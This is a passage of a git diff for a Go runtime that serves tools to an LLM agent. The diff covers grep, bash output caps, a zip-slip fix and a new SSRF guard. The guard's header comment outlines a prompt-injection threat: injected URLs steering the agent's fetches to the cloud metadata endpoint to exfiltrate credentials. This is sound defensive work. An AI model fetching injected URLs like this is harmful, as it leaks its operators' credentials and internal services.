Push past the LimitedWriter's 10MB cap. dd writes a fixed budget then + // exits, so we don't depend on SIGPIPE propagation to terminate `yes`. + cmd := "dd if=/dev/zero bs=1048576 count=11 2>/dev/null" + result, err := ws.Bash(ctx, &protocol.BashArgs{Command: cmd}) + require.NoError(t, err) + + assert.True(t, result.TruncatedStdout, "10MB cap must have been hit") + // The cap marker is appended to the captured buffer; after + // processLargeOutput it lives in the spilled file (the in-context preview + // only carries the first ~20 lines). 
+ if !strings.Contains(result.Stdout, "[output capped") { + assert.NotEmpty(t, result.StdoutFilePath, "spilled file must exist when cap was hit") + } +} diff --git a/environment/environment.go b/environment/environment.go index 803e243..86c1658 100644 --- a/environment/environment.go +++ b/environment/environment.go @@ -8,12 +8,14 @@ import ( "context" "encoding/base64" "encoding/json" + "errors" "fmt" "io" "log/slog" "os" "os/exec" "path/filepath" + "regexp" "sort" "strconv" "strings" @@ -286,6 +288,15 @@ func (e *Environment) Glob(ctx context.Context, args *protocol.GlobArgs) (*proto return &protocol.GlobResult{Matches: matches}, nil } +// defaultGrepIgnoreDirs are walked-but-skipped by the Go fallback to align with +// ripgrep's default .gitignore behavior. A model-issued grep on a workspace +// containing `node_modules` should not waste minutes scanning it. +var defaultGrepIgnoreDirs = map[string]struct{}{ + ".git": {}, + "node_modules": {}, + ".flashduty": {}, // covers .flashduty/.work and friends +} + // Grep searches for a pattern in files. func (e *Environment) Grep(ctx context.Context, args *protocol.GrepArgs) (*protocol.GrepResult, error) { var res *protocol.GrepResult @@ -301,12 +312,19 @@ func (e *Environment) Grep(ctx context.Context, args *protocol.GrepArgs) (*proto return res, err } - // Build content string - var sb strings.Builder - for _, match := range res.Matches { - fmt.Fprintf(&sb, "%s:%d:%s\n", match.Path, match.LineNumber, match.Content) + // Apply head_limit cap before formatting; the truncation note belongs in the + // final content so the model can see "I asked for 10, got 10 of N". + totalMatches := len(res.Matches) + if args.HeadLimit > 0 && totalMatches > args.HeadLimit { + res.Matches = res.Matches[:args.HeadLimit] + } + + // Format content per OutputMode. Default ("" or "content") preserves the + // pre-PR-4 file:line:text shape so existing callers see no change. 
+ content := formatGrepContent(res.Matches, args.OutputMode) + if args.HeadLimit > 0 && totalMatches > args.HeadLimit { + content += fmt.Sprintf("\n[truncated to first %d of %d matches]\n", args.HeadLimit, totalMatches) } - content := sb.String() // Process large output processor := NewLargeOutputProcessor(e, DefaultLargeOutputConfig()) @@ -325,37 +343,156 @@ func (e *Environment) Grep(ctx context.Context, args *protocol.GrepArgs) (*proto return res, nil } +// formatGrepContent renders matches per OutputMode. Unknown / empty mode falls +// back to "content" so downstream callers get the historical shape. +func formatGrepContent(matches []protocol.GrepMatch, mode string) string { + var sb strings.Builder + switch mode { + case "files_with_matches": + seen := make(map[string]struct{}, len(matches)) + for _, m := range matches { + if _, ok := seen[m.Path]; ok { + continue + } + seen[m.Path] = struct{}{} + sb.WriteString(m.Path) + sb.WriteByte('\n') + } + case "count": + counts := make(map[string]int, len(matches)) + order := make([]string, 0, len(matches)) + for _, m := range matches { + if _, ok := counts[m.Path]; !ok { + order = append(order, m.Path) + } + counts[m.Path]++ + } + for _, p := range order { + fmt.Fprintf(&sb, "%s:%d\n", p, counts[p]) + } + default: // "content" or empty + for _, m := range matches { + fmt.Fprintf(&sb, "%s:%d:%s\n", m.Path, m.LineNumber, m.Content) + } + } + return sb.String() +} + func (e *Environment) grepWithRipgrep(ctx context.Context, args *protocol.GrepArgs) (*protocol.GrepResult, error) { - cmdArgs := make([]string, 0, 6+2*len(args.Include)+2) - cmdArgs = append(cmdArgs, "--column", "--line-number", "--no-heading", "--color", "never", "--smart-case") + cmdArgs := make([]string, 0, 16+2*len(args.Include)) + + // OutputMode-specific flags. "content" uses --column for column info; the + // other modes drop --column so each rg line has a stable shape we can parse. 
+ mode := args.OutputMode + switch mode { + case "files_with_matches": + cmdArgs = append(cmdArgs, "--files-with-matches", "--no-heading", "--color", "never") + case "count": + cmdArgs = append(cmdArgs, "--count", "--no-heading", "--color", "never") + default: + cmdArgs = append(cmdArgs, "--line-number", "--no-heading", "--color", "never") + } + + switch { + case args.CaseSensitive == nil: + cmdArgs = append(cmdArgs, "--smart-case") + case *args.CaseSensitive: + cmdArgs = append(cmdArgs, "--case-sensitive") + default: + cmdArgs = append(cmdArgs, "--ignore-case") + } + + if args.ContextBefore > 0 && (mode == "" || mode == "content") { + cmdArgs = append(cmdArgs, "--before-context", strconv.Itoa(args.ContextBefore)) + } + if args.ContextAfter > 0 && (mode == "" || mode == "content") { + cmdArgs = append(cmdArgs, "--after-context", strconv.Itoa(args.ContextAfter)) + } + if args.FileType != "" { + cmdArgs = append(cmdArgs, "--type", args.FileType) + } for _, inc := range args.Include { cmdArgs = append(cmdArgs, "--glob", inc) } - cmdArgs = append(cmdArgs, args.Pattern, ".") + + // `--` separator so a pattern starting with `-` is not parsed as an rg flag + // (e.g. searching for "--foo" or "-x" in source). + cmdArgs = append(cmdArgs, "--", args.Pattern, ".") cmd := exec.CommandContext(ctx, "rg", cmdArgs...) //nolint:gosec // G204: args built from validated grep parameters cmd.Dir = e.root - var stdout strings.Builder + var stdout, stderr strings.Builder cmd.Stdout = &stdout - _ = cmd.Run() // rg returns exit code 1 if no matches found + cmd.Stderr = &stderr + runErr := cmd.Run() + + // rg exit codes: 0 = matches found, 1 = no matches, 2 = real error (bad + // pattern, I/O failure, permission). We previously swallowed code 2 as + // "no matches", which silently dropped pattern compile errors. 
+ if runErr != nil { + var exitErr *exec.ExitError + if errors.As(runErr, &exitErr) && exitErr.ExitCode() >= 2 { + msg := strings.TrimSpace(stderr.String()) + if msg == "" { + msg = exitErr.Error() + } + return nil, fmt.Errorf("ripgrep failed: %s", msg) + } + // exit code 1 (no matches) — keep going with empty stdout. + } lines := strings.Split(stdout.String(), "\n") results := make([]protocol.GrepMatch, 0, len(lines)) + for _, line := range lines { if line == "" { continue } - parts := strings.SplitN(line, ":", 4) - if len(parts) < 4 { - continue + + switch mode { + case "files_with_matches": + results = append(results, protocol.GrepMatch{Path: line}) + case "count": + // rg --count emits "path:N"; rsplit once so paths containing `:` survive. + idx := strings.LastIndex(line, ":") + if idx < 0 { + continue + } + cnt, _ := strconv.Atoi(line[idx+1:]) + results = append(results, protocol.GrepMatch{Path: line[:idx], LineNumber: cnt}) + default: + // rg with --line-number (no --column) emits "path:lineNum:content". + // Rsplit twice from the right so path containing ':' (Windows drive, + // scratch namespaces, etc.) parses correctly. + lastIdx := strings.LastIndex(line, ":") + if lastIdx < 0 { + continue + } + head, content := line[:lastIdx], line[lastIdx+1:] + midIdx := strings.LastIndex(head, ":") + if midIdx < 0 { + // Context lines from rg use `path-lineNum-content` separator; + // fall back to splitting on `-` for those rather than dropping. 
+ dashIdx := strings.LastIndex(head, "-") + if dashIdx < 0 { + continue + } + lineNum, _ := strconv.Atoi(head[dashIdx+1:]) + results = append(results, protocol.GrepMatch{ + Path: head[:dashIdx], + LineNumber: lineNum, + Content: content, + }) + continue + } + lineNum, _ := strconv.Atoi(head[midIdx+1:]) + results = append(results, protocol.GrepMatch{ + Path: head[:midIdx], + LineNumber: lineNum, + Content: content, + }) } - lineNum, _ := strconv.Atoi(parts[1]) - results = append(results, protocol.GrepMatch{ - Path: parts[0], - LineNumber: lineNum, - Content: parts[3], - }) } return &protocol.GrepResult{Matches: results}, nil } @@ -367,6 +504,30 @@ func (e *Environment) grepWithGo(ctx context.Context, args *protocol.GrepArgs) ( include = []string{"**/*"} } + // Try to compile the pattern as a regex. On compile failure, fall back to + // literal substring match and surface the error so the caller knows the + // pattern was treated as text rather than a regex. + caseInsensitive := args.CaseSensitive != nil && !*args.CaseSensitive + pattern := args.Pattern + if caseInsensitive { + pattern = "(?i)" + pattern + } + re, compileErr := regexp.Compile(pattern) + literalNeedle := args.Pattern + if caseInsensitive { + literalNeedle = strings.ToLower(literalNeedle) + } + + matchLine := func(line string) bool { + if re != nil { + return re.MatchString(line) + } + if caseInsensitive { + return strings.Contains(strings.ToLower(line), literalNeedle) + } + return strings.Contains(line, literalNeedle) + } + for _, inc := range include { matches, err := e.Glob(ctx, &protocol.GlobArgs{Pattern: inc}) if err != nil { @@ -374,17 +535,27 @@ func (e *Environment) grepWithGo(ctx context.Context, args *protocol.GrepArgs) ( } for _, match := range matches.Matches { - realPath, _ := e.safePath(match) + if shouldIgnoreGrepPath(match) { + continue + } + realPath, err := e.safePath(match) + if err != nil { + continue + } file, err := os.Open(realPath) if err != nil { continue } scanner := 
bufio.NewScanner(file) + // Default 64KB cap silently drops long lines (minified JS, packed + // JSON, log dumps). Bump to 1MB so the model gets a faithful match + // set rather than a confusing zero-result on real-world files. + scanner.Buffer(make([]byte, 64*1024), 1024*1024) lineNum := 1 for scanner.Scan() { line := scanner.Text() - if strings.Contains(line, args.Pattern) { + if matchLine(line) { results = append(results, protocol.GrepMatch{ Path: match, LineNumber: lineNum, @@ -396,7 +567,23 @@ func (e *Environment) grepWithGo(ctx context.Context, args *protocol.GrepArgs) ( _ = file.Close() } } - return &protocol.GrepResult{Matches: results}, nil + + res := &protocol.GrepResult{Matches: results} + if compileErr != nil { + res.RegexCompileError = compileErr.Error() + } + return res, nil +} + +// shouldIgnoreGrepPath returns true for any path whose relative form contains +// a default-ignored directory segment (.git, node_modules, .flashduty/...). +func shouldIgnoreGrepPath(rel string) bool { + for _, seg := range strings.Split(filepath.ToSlash(rel), "/") { + if _, ok := defaultGrepIgnoreDirs[seg]; ok { + return true + } + } + return false } // Bash executes a bash command in the workspace. 
@@ -418,7 +605,9 @@ func (e *Environment) Bash(ctx context.Context, args *protocol.BashArgs) (*proto // Skip large output processing for .outputs/ directory reads if ShouldSkipForOutputsDir(args.Command) { - result.TotalSize = int64(len(result.Stdout)) + result.StdoutTotalSize = int64(len(result.Stdout)) + result.StderrTotalSize = int64(len(result.Stderr)) + result.TotalSize = result.StdoutTotalSize return result, nil } @@ -449,12 +638,14 @@ func (e *Environment) executeBashCommand(ctx context.Context, command, workdir s cmd := exec.CommandContext(ctx, "bash", "-c", command) //nolint:gosec // G204: command is user-initiated via workspace tool cmd.Dir = workdir - // Use a limited writer to prevent OOM from very large outputs - // 10MB limit is plenty for LLM context while preventing memory exhaustion + // 10MB per-stream cap prevents OOM from runaway commands while leaving + // plenty of headroom for normal LLM-context output. const maxOutputSize = 10 * 1024 * 1024 var stdout, stderr strings.Builder - cmd.Stdout = &LimitedWriter{W: &stdout, Limit: maxOutputSize} - cmd.Stderr = &LimitedWriter{W: &stderr, Limit: maxOutputSize} + stdoutW := &LimitedWriter{W: &stdout, Limit: maxOutputSize} + stderrW := &LimitedWriter{W: &stderr, Limit: maxOutputSize} + cmd.Stdout = stdoutW + cmd.Stderr = stderrW err := cmd.Run() exitCode := 0 @@ -462,65 +653,151 @@ func (e *Environment) executeBashCommand(ctx context.Context, command, workdir s if exitError, ok := err.(*exec.ExitError); ok { exitCode = exitError.ExitCode() } else if ctx.Err() == context.DeadlineExceeded { - return &protocol.BashResult{ - Stdout: stdout.String(), - Stderr: "command timed out", - ExitCode: 124, - }, nil + res := &protocol.BashResult{ + Stdout: stdout.String(), + Stderr: "command timed out", + ExitCode: 124, + TruncatedStdout: stdoutW.Hit(), + } + if stdoutW.Hit() { + res.Truncated = true + } + return res, nil + } else if errors.Is(err, ErrOutputCapped) { + // Command itself didn't fail — only the writer's 
contract violation + // surfaced. Treat as a successful run with capped buffers. + err = nil } else { return nil, fmt.Errorf("failed to execute command: %w", err) } } - return &protocol.BashResult{ - Stdout: stdout.String(), - Stderr: stderr.String(), - ExitCode: exitCode, - }, nil + res := &protocol.BashResult{ + Stdout: stdout.String(), + Stderr: stderr.String(), + ExitCode: exitCode, + TruncatedStdout: stdoutW.Hit(), + TruncatedStderr: stderrW.Hit(), + } + if stdoutW.Hit() { + res.Truncated = true + } + return res, nil } -// LimitedWriter is an io.Writer that limits the total number of bytes written. +// ErrOutputCapped is returned by LimitedWriter once its byte cap has been +// reached. Surfaces the contract violation that would otherwise be hidden by +// the writer pretending it accepted everything (`return len(p), nil`). +var ErrOutputCapped = errors.New("output capped") + +// LimitedWriter is an io.Writer that caps the total number of bytes forwarded +// to the wrapped writer. After the cap is reached it appends an inline marker +// once and then returns ErrOutputCapped on every subsequent write so callers +// can detect truncation via Hit(). +// +// NOTE: exec.Cmd treats any writer error as fatal — callers wrapping LimitedWriter +// around a stdio pipe must filter ErrOutputCapped out of cmd.Run()'s error chain. type LimitedWriter struct { - W io.Writer - Limit int64 - curr int64 + W io.Writer + Limit int64 + curr int64 + hit bool + marker bool // marker already appended } +const limitedWriterMarker = "\n[output capped at 10MB]\n" + func (l *LimitedWriter) Write(p []byte) (n int, err error) { if l.curr >= l.Limit { - return len(p), nil + l.hit = true + l.appendMarker() + // Honor io.Writer contract: report only the bytes actually accepted + // downstream (zero) and propagate the cap signal so the caller can + // surface truncation instead of silently dropping data. 
+ return 0, ErrOutputCapped } left := l.Limit - l.curr if int64(len(p)) > left { n, err = l.W.Write(p[:left]) l.curr += int64(n) - return len(p), err + l.hit = true + l.appendMarker() + if err == nil { + err = ErrOutputCapped + } + // Return the bytes actually written to the underlying writer; the + // remainder (p[left:]) was discarded along with the cap signal. + return n, err } n, err = l.W.Write(p) l.curr += int64(n) return n, err } -// processLargeOutput processes command output for truncation if needed. +// Hit reports whether the writer's byte cap has been reached. +func (l *LimitedWriter) Hit() bool { return l.hit } + +// appendMarker writes the cap marker into the underlying writer exactly once. +// Bypasses the per-call accounting since the marker is bookkeeping, not output. +func (l *LimitedWriter) appendMarker() { + if l.marker { + return + } + l.marker = true + _, _ = l.W.Write([]byte(limitedWriterMarker)) +} + +// processLargeOutput processes both stdout and stderr for truncation if needed. +// Each stream is spilled to its own .outputs/_*.txt or +// .outputs/_stderr_*.txt file when it exceeds the configured cap. +// +// Stderr was previously left untouched, which let high-stderr commands +// (e.g. `yes 2>&1 1>/dev/null | head`) flood the LLM context unbounded. func (e *Environment) processLargeOutput(ctx context.Context, result *protocol.BashResult, prefix string) (*protocol.BashResult, error) { processor := NewLargeOutputProcessor(e, DefaultLargeOutputConfig()) - processed, err := processor.Process(ctx, result.Stdout, prefix) + + stdoutSize := int64(len(result.Stdout)) + stderrSize := int64(len(result.Stderr)) + + processedOut, err := processor.Process(ctx, result.Stdout, prefix) if err != nil { - result.TotalSize = int64(len(result.Stdout)) + // File-write failure: keep the raw streams and at minimum report sizes. 
+ result.StdoutTotalSize = stdoutSize + result.StderrTotalSize = stderrSize + result.TotalSize = stdoutSize return result, nil } + result.Stdout = processedOut.Content + result.StdoutTotalSize = processedOut.TotalSize + result.StdoutFilePath = processedOut.FilePath + if processedOut.Truncated { + result.TruncatedStdout = true + } + + processedErr, err := processor.Process(ctx, result.Stderr, prefix+"_stderr") + if err != nil { + result.StderrTotalSize = stderrSize + } else { + result.Stderr = processedErr.Content + result.StderrTotalSize = processedErr.TotalSize + result.StderrFilePath = processedErr.FilePath + if processedErr.Truncated { + result.TruncatedStderr = true + } + } - result.Stdout = processed.Content - result.Truncated = processed.Truncated - result.FilePath = processed.FilePath - result.TotalSize = processed.TotalSize + // Legacy mirrors: keep the stdout-side fields populated for old clients. + result.Truncated = result.TruncatedStdout + result.FilePath = result.StdoutFilePath + result.TotalSize = result.StdoutTotalSize return result, nil } -// WriteRaw writes raw content (not base64 encoded) to a file. -// Used internally for saving large output files. -func (e *Environment) WriteRaw(ctx context.Context, path string, content []byte) error { +// writeRaw writes raw content (not base64 encoded) to a file. +// Used internally for saving large output files; unexported because no +// off-package caller exists (only large_output.go uses it). +func (e *Environment) writeRaw(ctx context.Context, path string, content []byte) error { realPath, err := e.safePath(path) if err != nil { return err @@ -654,16 +931,32 @@ func (e *Environment) unzipSkill(data []byte, dest string) error { return fmt.Errorf("failed to create destination directory: %w", err) } + // Resolve dest to absolute and append a trailing separator BEFORE the + // loop. 
Zip-slip mitigation: comparing against the dir without a + // trailing separator (the previous bug) lets a sibling with a matching + // prefix — e.g. dest="/tmp/skill" vs absTarget="/tmp/skill-evil/x" — + // pass HasPrefix even though the entry escapes the intended directory. + absDest, err := filepath.Abs(dest) + if err != nil { + return fmt.Errorf("failed to resolve dest: %w", err) + } + destPrefix := absDest + string(os.PathSeparator) + for _, f := range reader.File { - // Security: validate zip entry path to prevent path traversal + // Reject any raw "..": filepath.Clean turns "a/../b" into "b" so a + // surviving ".." after Clean — or any literal ".." in the original + // — means the entry tried to escape from the root. + if strings.Contains(f.Name, "..") { + return fmt.Errorf("invalid file path in zip: %s", f.Name) + } cleanName := filepath.Clean(f.Name) if strings.HasPrefix(cleanName, "..") || filepath.IsAbs(cleanName) { return fmt.Errorf("invalid file path in zip: %s", f.Name) } - targetPath := filepath.Join(dest, cleanName) + targetPath := filepath.Join(absDest, cleanName) absTarget, err := filepath.Abs(targetPath) - if err != nil || !strings.HasPrefix(absTarget, dest) { + if err != nil || (absTarget != absDest && !strings.HasPrefix(absTarget, destPrefix)) { return fmt.Errorf("file path escapes destination: %s", f.Name) } diff --git a/environment/environment_test.go b/environment/environment_test.go index c3fa126..5a3c81f 100644 --- a/environment/environment_test.go +++ b/environment/environment_test.go @@ -8,6 +8,7 @@ import ( "errors" "os" "path/filepath" + "strings" "testing" "github.com/stretchr/testify/assert" @@ -162,6 +163,96 @@ func TestEnvironment_Grep(t *testing.T) { assert.Len(t, result.Matches, 2) } +// TestEnvironment_Grep_RegexNotSubstring exercises the PR-4 fix: the legacy +// path used strings.Contains, so "a.b" matched only the literal "a.b" instead +// of "axb". The regex path must now match both via the wildcard. 
+func TestEnvironment_Grep_RegexNotSubstring(t *testing.T) { + ws := newTestEnvironment(t) + ctx := context.Background() + require.NoError(t, os.WriteFile( + filepath.Join(ws.Root(), "f.txt"), + []byte("axb\nayb\na.b\nzzz\n"), + 0o644, + )) + + result, err := ws.Grep(ctx, &protocol.GrepArgs{Pattern: "a.b"}) + require.NoError(t, err) + // All three of axb / ayb / a.b should match a regex `a.b`. + assert.GreaterOrEqual(t, len(result.Matches), 3, + "regex 'a.b' should match all of axb, ayb, a.b — got %v", result.Matches) + assert.Empty(t, result.RegexCompileError, "valid regex must not surface compile error") +} + +// TestEnvironment_Grep_RegexCompileFallback confirms that a syntactically +// invalid regex still returns results via literal substring fallback and +// surfaces the compile error so the caller can show it to the model. +func TestEnvironment_Grep_RegexCompileFallback(t *testing.T) { + ws := newTestEnvironment(t) + ctx := context.Background() + require.NoError(t, os.WriteFile( + filepath.Join(ws.Root(), "f.txt"), + []byte("hello [unclosed\nworld\n"), + 0o644, + )) + + // "[unclosed" is a malformed regex (unclosed character class). + res, err := ws.grepWithGo(ctx, &protocol.GrepArgs{Pattern: "[unclosed"}) + require.NoError(t, err) + assert.NotEmpty(t, res.RegexCompileError, "compile failure must be surfaced") + require.NotEmpty(t, res.Matches, "literal fallback should still find the line") + assert.Contains(t, res.Matches[0].Content, "[unclosed") +} + +// TestEnvironment_Grep_DefaultIgnore verifies node_modules / .git are skipped +// by the Go fallback so a model issuing `grep` on a workspace with vendor +// dirs doesn't burn minutes scanning them. 
+func TestEnvironment_Grep_DefaultIgnore(t *testing.T) { + ws := newTestEnvironment(t) + ctx := context.Background() + + require.NoError(t, os.MkdirAll(filepath.Join(ws.Root(), "src"), 0o755)) + require.NoError(t, os.MkdirAll(filepath.Join(ws.Root(), "node_modules", "pkg"), 0o755)) + require.NoError(t, os.MkdirAll(filepath.Join(ws.Root(), ".git"), 0o755)) + + require.NoError(t, os.WriteFile(filepath.Join(ws.Root(), "src", "a.txt"), []byte("needle\n"), 0o644)) + require.NoError(t, os.WriteFile(filepath.Join(ws.Root(), "node_modules", "pkg", "b.txt"), []byte("needle\n"), 0o644)) + require.NoError(t, os.WriteFile(filepath.Join(ws.Root(), ".git", "c.txt"), []byte("needle\n"), 0o644)) + + res, err := ws.grepWithGo(ctx, &protocol.GrepArgs{Pattern: "needle"}) + require.NoError(t, err) + + for _, m := range res.Matches { + assert.NotContains(t, m.Path, "node_modules", "node_modules must be ignored, got %s", m.Path) + assert.NotContains(t, m.Path, ".git", ".git must be ignored, got %s", m.Path) + } + + // The src/ hit must still be present. + var sawSrc bool + for _, m := range res.Matches { + if strings.HasPrefix(filepath.ToSlash(m.Path), "src/") { + sawSrc = true + break + } + } + assert.True(t, sawSrc, "expected src/a.txt match in %v", res.Matches) +} + +// TestEnvironment_Grep_LongLine ensures the bumped scanner buffer catches +// matches on lines longer than the default 64 KB cap. +func TestEnvironment_Grep_LongLine(t *testing.T) { + ws := newTestEnvironment(t) + ctx := context.Background() + + // Build a single line: 80 KB of 'a', then NEEDLE, then 80 KB of 'b'. 
+ long := strings.Repeat("a", 80*1024) + "NEEDLE" + strings.Repeat("b", 80*1024) + "\n" + require.NoError(t, os.WriteFile(filepath.Join(ws.Root(), "long.txt"), []byte(long), 0o644)) + + res, err := ws.grepWithGo(ctx, &protocol.GrepArgs{Pattern: "NEEDLE"}) + require.NoError(t, err) + require.NotEmpty(t, res.Matches, "NEEDLE on a >64KB line must still match") + assert.Equal(t, "long.txt", res.Matches[0].Path) +} + func TestEnvironment_Bash(t *testing.T) { ws := newTestEnvironment(t) ctx := context.Background() diff --git a/environment/htmlx.go b/environment/htmlx.go new file mode 100644 index 0000000..37cdd90 --- /dev/null +++ b/environment/htmlx.go @@ -0,0 +1,51 @@ +// HTML→Markdown / HTML→Text conversion helpers used by webfetch. +// +// Inlined from go-pkg/x/htmlx — keep in sync. flashduty-runner is +// open-source and may not import internal flashcatcloud modules. +package environment + +import ( + "regexp" + "strings" + + htmltomarkdown "github.com/JohannesKaufmann/html-to-markdown/v2" +) + +// Pre-compiled to avoid recompiling on every conversion call. webfetch is on +// a hot path; per-call compile was a measurable waste. 
+var (
+	htmlScriptRe     = regexp.MustCompile(`(?is)<script[^>]*>.*?</script>`)
+	htmlStyleRe      = regexp.MustCompile(`(?is)<style[^>]*>.*?</style>`)
+	htmlTagRe        = regexp.MustCompile(`<[^>]+>`)
+	htmlWhitespaceRe = regexp.MustCompile(`\s+`)
+	htmlBlankLinesRe = regexp.MustCompile(`\n{3,}`)
+)
+
+func convertHTMLToMarkdown(html string) string {
+	md, err := htmltomarkdown.ConvertString(html)
+	if err != nil {
+		return convertHTMLToText(html)
+	}
+	return cleanupMarkdown(md)
+}
+
+func convertHTMLToText(html string) string {
+	html = htmlScriptRe.ReplaceAllString(html, "")
+	html = htmlStyleRe.ReplaceAllString(html, "")
+	text := htmlTagRe.ReplaceAllString(html, " ")
+
+	text = strings.ReplaceAll(text, "&nbsp;", " ")
+	text = strings.ReplaceAll(text, "&amp;", "&")
+	text = strings.ReplaceAll(text, "&lt;", "<")
+	text = strings.ReplaceAll(text, "&gt;", ">")
+	text = strings.ReplaceAll(text, "&quot;", "\"")
+	text = strings.ReplaceAll(text, "&#39;", "'")
+
+	text = htmlWhitespaceRe.ReplaceAllString(text, " ")
+	return strings.TrimSpace(text)
+}
+
+func cleanupMarkdown(md string) string {
+	md = htmlBlankLinesRe.ReplaceAllString(md, "\n\n")
+	return strings.TrimSpace(md)
+}
diff --git a/environment/large_output.go b/environment/large_output.go
index 2b8282b..84509a5 100644
--- a/environment/large_output.go
+++ b/environment/large_output.go
@@ -4,12 +4,18 @@ import (
 	"context"
 	"fmt"
 	"path/filepath"
+	"regexp"
 	"strings"
 	"time"
 
 	"github.com/lithammer/shortuuid/v4"
 )
 
+// readCommandRe matches the read commands as standalone tokens (anchored at
+// start of input or preceded by whitespace, semicolon, pipe, or `&`). Using
+// substring matching ("head ") false-positives against words like "thread ".
+var readCommandRe = regexp.MustCompile(`(?:^|[\s;|&])(?:cat|head|tail|less|more|bat)\s`) + const ( // DefaultMaxOutputSize is the default character limit before truncation (~7.5k tokens) DefaultMaxOutputSize = 30000 // ~7.5k tokens at 4 chars/token @@ -86,7 +92,7 @@ func (p *LargeOutputProcessor) Process(ctx context.Context, content string, pref filePath := filepath.Join(OutputsDir, filename) // Save full content to file - if err := p.ws.WriteRaw(ctx, filePath, []byte(content)); err != nil { + if err := p.ws.writeRaw(ctx, filePath, []byte(content)); err != nil { // If save fails, just return truncated content without file reference return &ProcessResult{ Content: p.truncateContent(content, ""), @@ -105,16 +111,12 @@ func (p *LargeOutputProcessor) Process(ctx context.Context, content string, pref // ShouldSkipForOutputsDir checks if large output processing should be skipped // for commands operating on .outputs/ directory to avoid circular processing. +// Uses a word-boundary regex so commands like "thread " don't match "head ". func ShouldSkipForOutputsDir(command string) bool { - readCommands := []string{"cat ", "head ", "tail ", "less ", "more ", "bat "} - for _, cmd := range readCommands { - if strings.Contains(command, cmd) { - if strings.Contains(command, OutputsDir+"/") || strings.Contains(command, OutputsDir+"\\") { - return true - } - } + if !readCommandRe.MatchString(command) { + return false } - return false + return strings.Contains(command, OutputsDir+"/") || strings.Contains(command, OutputsDir+"\\") } // truncateContent creates a truncated preview with optional file reference. diff --git a/environment/netsafe.go b/environment/netsafe.go new file mode 100644 index 0000000..e7babd2 --- /dev/null +++ b/environment/netsafe.go @@ -0,0 +1,192 @@ +// SSRF guard for outbound HTTP. 
Runner pods must NEVER reach IMDS or the +// cluster apiserver from inside; without dial-time IP validation a +// prompt-injected URL can exfiltrate cloud credentials from +// 169.254.169.254 or hit internal VPC services. The DNS-to-dial +// re-resolution closes the DNS-rebinding gap a host-string allowlist +// would leave open. +// +// Inlined from go-pkg/x/netsafe — keep in sync. flashduty-runner is +// open-source and may not import internal flashcatcloud modules. +package environment + +import ( + "context" + "fmt" + "net" + "net/http" + "net/url" + "os" + "strings" + "time" +) + +// maxRedirects caps redirect chains processed by safeCheckRedirect. Default +// Go is 10; CC web-fetch and Codex both cap around 5. +const maxRedirects = 5 + +func ipBlocked(ip net.IP) bool { + if ip == nil { + return true + } + if ip.IsLoopback() || ip.IsPrivate() || ip.IsLinkLocalUnicast() || ip.IsLinkLocalMulticast() || + ip.IsInterfaceLocalMulticast() || ip.IsMulticast() || ip.IsUnspecified() { + return true + } + if v4 := ip.To4(); v4 != nil { + // CGNAT 100.64.0.0/10 + IETF protocol-assignment 192.0.0.0/24 — both + // routable-but-internal, missed by IsPrivate. + if v4[0] == 100 && v4[1] >= 64 && v4[1] <= 127 { + return true + } + if v4[0] == 192 && v4[1] == 0 && v4[2] == 0 { + return true + } + } + return false +} + +// validateHost resolves host and returns an error if any resolved IP is +// blocked. Pre-flight check that gives a clearer error than the dial-time +// failure when the model passes a literal IMDS / RFC1918 URL. 
+func validateHost(ctx context.Context, host string) error { + if host == "" { + return fmt.Errorf("host is empty") + } + if h, _, err := net.SplitHostPort(host); err == nil { + host = h + } + if ip := net.ParseIP(host); ip != nil { + if ipBlocked(ip) { + return fmt.Errorf("target %s resolves to a blocked address range", host) + } + return nil + } + ips, err := net.DefaultResolver.LookupIPAddr(ctx, host) + if err != nil { + return fmt.Errorf("resolve %s: %w", host, err) + } + for _, addr := range ips { + if ipBlocked(addr.IP) { + return fmt.Errorf("target %s resolves to a blocked address (%s)", host, addr.IP) + } + } + return nil +} + +// validateURL parses raw, rejects non-http(s) schemes, and validates the +// host. Returns the parsed URL on success so callers don't re-parse. +func validateURL(ctx context.Context, raw string) (*url.URL, error) { + u, err := url.Parse(raw) + if err != nil { + return nil, fmt.Errorf("parse url: %w", err) + } + if u.Scheme != "http" && u.Scheme != "https" { + return nil, fmt.Errorf("url scheme must be http or https") + } + if u.Host == "" { + return nil, fmt.Errorf("url host must not be empty") + } + if err := validateHost(ctx, u.Hostname()); err != nil { + return nil, err + } + return u, nil +} + +// safeDialContext returns a DialContext that re-resolves the host on every +// dial and rejects blocked IPs. ServerName for TLS still derives from the +// request hostname so cert validation works. 
+func safeDialContext(dialTimeout time.Duration) func(ctx context.Context, network, addr string) (net.Conn, error) { + d := &net.Dialer{Timeout: dialTimeout, KeepAlive: 30 * time.Second} + proxyHosts := envProxyHosts() + return func(ctx context.Context, network, addr string) (net.Conn, error) { + host, port, err := net.SplitHostPort(addr) + if err != nil { + return nil, err + } + // Configured HTTP(S) proxy hops bypass SSRF validation: the proxy is + // trusted egress infrastructure (often a loopback sidecar) and + // enforces its own destination policy. Final-destination validation + // still runs upstream at validateURL when the caller is a + // user-supplied URL. + if _, ok := proxyHosts[host]; ok { + return d.DialContext(ctx, network, addr) + } + if ip := net.ParseIP(host); ip != nil { + if ipBlocked(ip) { + return nil, fmt.Errorf("blocked address %s", ip) + } + return d.DialContext(ctx, network, addr) + } + ips, err := net.DefaultResolver.LookupIPAddr(ctx, host) + if err != nil { + return nil, err + } + var lastErr error + for _, addr := range ips { + if ipBlocked(addr.IP) { + lastErr = fmt.Errorf("blocked address %s", addr.IP) + continue + } + conn, err := d.DialContext(ctx, network, net.JoinHostPort(addr.IP.String(), port)) + if err == nil { + return conn, nil + } + lastErr = err + } + if lastErr == nil { + lastErr = fmt.Errorf("no resolvable address for %s", host) + } + return nil, lastErr + } +} + +// safeHTTPTransport returns an *http.Transport wired with safeDialContext +// and sensible pool sizes. +func safeHTTPTransport(dialTimeout time.Duration) *http.Transport { + t := http.DefaultTransport.(*http.Transport).Clone() + t.DialContext = safeDialContext(dialTimeout) + return t +} + +// safeCheckRedirect re-validates each hop's host and caps the chain at +// maxRedirects. Without this, a 302 from a permitted host to +// http://169.254.169.254/ is followed by Go's default policy. 
